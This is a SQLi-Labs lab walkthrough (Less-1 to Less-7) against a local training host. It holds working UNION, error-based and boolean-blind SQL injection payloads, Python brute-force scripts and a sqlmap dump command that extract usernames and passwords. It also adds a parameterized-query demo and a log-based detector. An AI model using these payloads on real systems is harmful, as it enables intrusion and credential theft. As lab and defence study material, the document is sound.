Less-1
Closed with a single quote
$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
If the input is $id = 1' # the statement is concatenated as below, and everything after '#' is commented out:
$sql="SELECT * FROM users WHERE id='1'#' LIMIT 0,1";
Only one row is displayed; injecting with sqlmap is enough.
Less-2
Integer injection
$sql="SELECT * FROM users WHERE id=$id LIMIT 0,1";
With input $id = 1# the statement is concatenated as below, everything after '#' is commented out; inject with sqlmap:
$sql="SELECT * FROM users WHERE id=1# LIMIT 0,1";
Manual injection
http://192.168.8.1/sqli/sqli/Less-2/?id=-1 union select 1,2,group_concat(schema_name) from information_schema.schemata#
http://192.168.8.1/sqli/sqli/Less-2/?id=-1 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema = 'security'#
http://192.168.8.1/sqli/sqli/Less-2/?id=-1 union select 1,2,group_concat(column_name) from information_schema.columns where table_name= 'users'#
http://192.168.8.1/sqli/sqli/Less-2/?id=-1 union select 1,2,group_concat(username,'~',password) from users #
Less-3
$sql="SELECT * FROM users WHERE id=('$id') LIMIT 0,1";
If the input is $id = 1') -- + the concatenated statement is the following, and everything after '-- +' is commented out:
$sql="SELECT * FROM users WHERE id=('1')-- +') LIMIT 0,1";
Manual injection
http://192.168.8.1/sqli/sqli/Less-3/?id=-1') union select 1,2,group_concat(schema_name) from information_schema.schemata -- +
http://192.168.8.1/sqli/sqli/Less-3/?id=-1') union select 1,2,group_concat(table_name) from information_schema.tables where table_schema= 'security'-- +
http://192.168.8.1/sqli/sqli/Less-3/?id=-1') union select 1,2,group_concat(column_name) from information_schema.columns where table_name ='users' -- +
http://192.168.8.1/sqli/sqli/Less-3/?id=-1') union select 1,2,group_concat(username,'~',password) from users -- +
Less-4
$id = '"' . $id . '"';
$sql="SELECT * FROM users WHERE id=($id) LIMIT 0,1";
With input $id = 1 ") -- + the statement is concatenated as:
$sql="SELECT * FROM users WHERE id=("$id") -- +) LIMIT 0,1";
Inject with sqlmap
Save the request to a file and run the injection from it
Manual injection
http://192.168.8.1/sqli/sqli/Less-4/?id= 1 ") order by 4 -- +
http://192.168.8.1/sqli/sqli/Less-4/?id= -1 ") union select 1,2,group_concat(schema_name) from information_schema.schemata -- +
http://192.168.8.1/sqli/sqli/Less-4/?id= -1 ") union select 1,2,group_concat(column_name) from information_schema.columns where table_schema = 'security' -- +
http://192.168.8.1/sqli/sqli/Less-4/?id= -1 ") union select 1,2,group_concat(username,'~',password) from users -- +
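As an added example (not part of the original notes), the pattern shared by Less-1 to Less-4, pasting $id straight into the SQL text, is shown next to the two controls that close it: a bound parameter and strict input validation for the integer endpoint. It uses an in-memory sqlite3 table as a constructed stand-in for the lab's MySQL users table (rows are made up), and the Less-3 closing payload "1') -- +" from the notes, whose "-- " comment both MySQL and sqlite accept.

```python
import re
import sqlite3


def make_demo_db():
    """Constructed stand-in for the lab's security.users table (in-memory sqlite3)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    conn.executemany(
        "INSERT INTO users VALUES (?, ?, ?)",
        [(1, "alice", "alice-pw"), (2, "bob", "bob-pw")],  # made-up rows
    )
    conn.commit()
    return conn


def lookup_unsafe(conn, raw_id):
    """Mirrors the Less-3 PHP: $id is pasted into the SQL text, quotes and all."""
    sql = "SELECT * FROM users WHERE id=('%s') LIMIT 0,1" % raw_id
    return conn.execute(sql).fetchone()


def lookup_safe(conn, raw_id):
    """Same query with a bound parameter: the driver sends raw_id as a value,
    so quotes and comment markers inside it can never alter the statement."""
    sql = "SELECT * FROM users WHERE id=(?) LIMIT 0,1"
    return conn.execute(sql, (raw_id,)).fetchone()


def parse_id(raw_id):
    """Input validation for the integer endpoint (Less-2): accept only a plain
    ASCII decimal integer, so '1#' is rejected before any SQL is built.
    (Negative ids are rejected too; the lab's ids are positive.)"""
    if not re.fullmatch(r"[0-9]+", raw_id):
        raise ValueError("id must be a decimal integer")
    return int(raw_id)


if __name__ == "__main__":
    conn = make_demo_db()
    breakout = "1') -- +"  # the Less-3 closing payload from the notes
    print("unsafe:", lookup_unsafe(conn, breakout))  # row 1: the quote closed the string
    print("safe:  ", lookup_safe(conn, breakout))    # None: compared as a literal id value
    print("int:   ", parse_id("1"))
    try:
        parse_id("1#")
    except ValueError as err:
        print("rejected:", err)
```

The unsafe path returns row 1 for the breakout input because the quote and the "-- " comment rewrote the statement (the trailing LIMIT is swallowed by the comment, exactly as in the Less-3 walkthrough); the parameterized path compares the whole string against the id column and finds nothing. For the integer endpoint the comparison has no quotes to close, which is why validation of the value itself, not just parameterization, is the control to reach for.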
Less-5
Blind injection
Notice that when the select returns no data the page prints "错误" (wrong), otherwise "正确" (correct). Using this, brute-force with Burp (bp).
If the boolean joined after and evaluates to 0 the "wrong" message is printed; if it evaluates to 1 the "correct" message is printed.
So we construct the expression if(length(database())=3,1,0)
With it we can determine the length of the database name
http://192.168.8.1/sqli/sqli/Less-5/?id=1' and if(substr(database(),1,1)='s',1,0) -- +
Check the length of the table-name list
http://192.168.8.1/sqli/sqli/Less-5/?id=1' and if(length((select group_concat(table_name) from information_schema.tables where table_schema = 'security'))=10,1,0) -- +
Dump table names
import requests

flag = ""
for i in range(1, 30):        # character position inside the group_concat result
    for j in range(1, 128):   # candidate ASCII code for that position
        url = 'http://192.168.8.1/sqli/sqli/Less-5/?id=1%27%20and%20if(ascii(substr((select%20group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema%20=%20%27security%27),{},1))={},1,0)%20--%20+'.format(i, j)
        # "utf=-8" in the original is not a valid encoding name and raises LookupError
        tmp_text = requests.get(url).content.decode("utf-8", "ignore")
        # print(tmp_text)
        if '正确的' in tmp_text:   # the lab's "correct" marker text
            flag += chr(j)
print(flag)
Get the length of the column-name list
Dump column names
import requests

flag = ""
for i in range(1, 193):       # character position inside the group_concat result
    for j in range(1, 128):   # candidate ASCII code for that position
        url = 'http://192.168.8.1/sqli/sqli/Less-5/?id=1%27%20and%20if(ascii(substr((select%20group_concat(column_name)%20from%20information_schema.columns%20where%20table_name%20=%20%27users%27),{},1))={},1,0)%20--%20+'.format(i, j)
        tmp_text = requests.get(url).content.decode("utf-8", "ignore")  # fixed from "utf=-8"
        # print(tmp_text)
        if '正确的' in tmp_text:   # the lab's "correct" marker text
            flag += chr(j)
print(flag)
Dump data from the users table
import requests

flag = ""
for i in range(1, 193):       # character position inside the group_concat result
    for j in range(1, 128):   # candidate ASCII code for that position
        url = "http://192.168.8.1/sqli/sqli/Less-5/?id=1' and if(ascii(substr((select group_concat(password,'~',username) from users),{},1))={},1,0) -- +".format(i, j)
        tmp_text = requests.get(url).content.decode("utf-8", "ignore")  # fixed from "utf=-8"
        # print(tmp_text)
        if '正确的' in tmp_text:   # the lab's "correct" marker text
            flag += chr(j)
print(flag)
With sqlmap
python sqlmap.py -u http://192.168.8.1/sqli/sqli/Less-5/?id=1 --dump -D security -T users -C password,username
Less-5 can also be attacked with error-based injection: notice that when our input is malformed, the error message is printed on the page.
Here we use error-based injection through XPath syntax errors, mainly with the extractvalue and updatexml functions.
Syntax: extractvalue(xml_document, Xpath_string)
SQL> set linesize 300;
SQL> select * from dbmgr.xmldemo;
A B
---------- -------------------------------------------------------------------------------------------------------------
6 <A>3</A>
SQL> select EXTRACTVALUE(xmltype(B),'/A') from dbmgr.xmldemo;
EXTRACTVALUE(XMLTYPE(B),'/A')
------------------------------------------------------------------------------------------------------------------------
3
The second parameter must be a string that satisfies XPath syntax; if it does not, an error is raised and the result of our query is returned inside the error message.
http://192.168.8.1/sqli/sqli/Less-5/?id=1' and extractvalue(1,concat('~',(select group_concat(table_name) from information_schema.tables where table_schema = 'security'))) -- +
http://192.168.8.1/sqli/sqli/Less-5/?id=1' and extractvalue(1,concat('~',(select group_concat(column_name) from information_schema.columns where table_name= 'users'))) -- +
There is a problem here: extractvalue shows only 32 characters, so use substr to slice the result.
http://192.168.8.1/sqli/sqli/Less-5/?id=1' and extractvalue(1,concat('~',substr((select group_concat(column_name) from information_schema.columns where table_name= 'users'),32,32))) -- +
http://192.168.8.1/sqli/sqli/Less-5/?id=1' and extractvalue(1,concat('~',substr((select group_concat(username,'~',password) from users),96,32))) -- +
updatexml is much like extractvalue, but it performs an update; its parameters are updatexml(xml_document, Xpath_string, new_string), where new_string is the replacement value.
http://192.168.8.1/sqli/sqli/Less-5/?id=1' and updatexml(1,concat('~',(select group_concat(username,'~',password) from users)),1) -- +
Less-6
Much like Less-5, but here the value is closed with a double quote.
Error-based injection with extractvalue
1" and extractvalue(1,concat('~',database()))-- +
1" and extractvalue(1,concat('~',(select group_concat(table_name) from information_schema.tables where table_schema='security')))-- +
1" and extractvalue(1,concat('~',(select group_concat(column_name) from information_schema.columns where table_name='users')))-- +
?id=1" and extractvalue(1,concat('~',substr((select group_concat(column_name) from information_schema.columns where table_name='users'),32,32)))-- +
?id=1" and extractvalue(1,concat('~',substr((select group_concat(username,'~',password) from users),1,32)))-- +
Less-7
Error-based injection can no longer be used here,
but boolean-based blind injection still works
import requests

flag = ""
for i in range(1, 193):       # character position inside the group_concat result
    for j in range(1, 128):   # candidate ASCII code for that position
        url = "http://192.168.8.1/sqli/sqli/Less-7/?id=1')) and if(ascii(substr((select group_concat(username,'~',password) from users),{},1))={},1,0) --+".format(i, j)
        tmp_text = requests.get(url).content.decode("utf-8", "ignore")  # fixed from "utf=-8"
        # print(tmp_text)
        if 'Use' in tmp_text:   # marker from the Less-7 "Use outfile" success message
            flag += chr(j)
print(flag)
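As an added example from the defender's side (not part of the original notes), the following Python scans web-server access logs for the traffic these walkthroughs generate: the union/information_schema probes of Less-2 to Less-4, the extractvalue/updatexml error-based payloads of Less-5 and Less-6, and the boolean-blind loops of Less-5 and Less-7, which send one request per (position, candidate byte) and so differ only in their numbers. The log lines are constructed, in Apache combined-log shape, and carry the notes' own payloads URL-encoded as a browser or requests would send them; the indicator list and threshold are assumptions for the demo.

```python
import re
from collections import Counter, defaultdict
from urllib.parse import unquote_plus

# Constructed access-log lines (not real traffic); payloads are the ones from these notes.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /sqli/sqli/Less-2/?id=1 HTTP/1.1" 200 512
10.0.0.9 - - [01/Jan/2024:10:00:02 +0000] "GET /sqli/sqli/Less-2/?id=-1%20union%20select%201,2,group_concat(schema_name)%20from%20information_schema.schemata%23 HTTP/1.1" 200 640
10.0.0.9 - - [01/Jan/2024:10:00:03 +0000] "GET /sqli/sqli/Less-5/?id=1%27%20and%20if(ascii(substr((select%20group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema%20=%20%27security%27),1,1))=101,1,0)%20--%20+ HTTP/1.1" 200 380
10.0.0.9 - - [01/Jan/2024:10:00:03 +0000] "GET /sqli/sqli/Less-5/?id=1%27%20and%20if(ascii(substr((select%20group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema%20=%20%27security%27),1,1))=102,1,0)%20--%20+ HTTP/1.1" 200 380
10.0.0.9 - - [01/Jan/2024:10:00:04 +0000] "GET /sqli/sqli/Less-5/?id=1%27%20and%20extractvalue(1,concat(%27~%27,database()))%20--%20+ HTTP/1.1" 200 410
10.0.0.7 - - [01/Jan/2024:10:00:05 +0000] "GET /sqli/sqli/Less-1/?id=2 HTTP/1.1" 200 512
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)

# Indicators are matched against the *decoded* query: the lab payloads arrive as
# %27 / %20 / %23, so a match on the raw line would miss them.
INDICATORS = [
    ("union_select", re.compile(r"\bunion\s+(all\s+)?select\b", re.I)),
    ("information_schema", re.compile(r"\binformation_schema\.", re.I)),
    ("boolean_blind", re.compile(r"\bif\s*\(\s*ascii\s*\(\s*substr", re.I)),
    ("xml_error_based", re.compile(r"\b(extractvalue|updatexml)\s*\(", re.I)),
    ("comment_terminator", re.compile(r"(--|#)\s*$")),
]


def classify_request(path):
    """Names of the indicators that fire on one request path (after URL decoding)."""
    decoded = unquote_plus(path)
    return [name for name, rx in INDICATORS if rx.search(decoded)]


def request_shape(path):
    """Collapse every digit run so the position/byte counters of a blind loop
    map to one key: the Less-5 and Less-7 scripts differ only in those numbers."""
    return re.sub(r"\d+", "N", unquote_plus(path))


def analyze_log(text, burst_threshold=2):
    """Return ({ip: {indicator: count}}, {(ip, shape): count}) for flagged requests.
    Shapes are counted only for requests that hit an indicator, so ordinary users
    paging through ids do not register as a burst. burst_threshold=2 suits this
    tiny sample; the scripts above send up to 127 requests per character, so a
    real rule would use a far higher count per minute."""
    hits = defaultdict(Counter)
    shapes = Counter()
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        ip, path = m.group("ip"), m.group("path")
        names = classify_request(path)
        for name in names:
            hits[ip][name] += 1
        if names:
            shapes[(ip, request_shape(path))] += 1
    bursts = {key: n for key, n in shapes.items() if n >= burst_threshold}
    return {ip: dict(c) for ip, c in hits.items()}, bursts


if __name__ == "__main__":
    hits, bursts = analyze_log(SAMPLE_LOG)
    for ip, counts in hits.items():
        print(ip, counts)
    for (ip, shape), n in bursts.items():
        print("burst:", ip, n, shape[:60])
```

On the sample, 10.0.0.9 is flagged on every indicator and its two boolean-blind requests collapse to one shape, which is the signal a per-source rate rule keys on; the two benign requests from other hosts trigger nothing. Decoding before matching is the step most often skipped in ad-hoc log greps, and it is why the %27 form of the Less-5 script slips past a rule written for a literal quote.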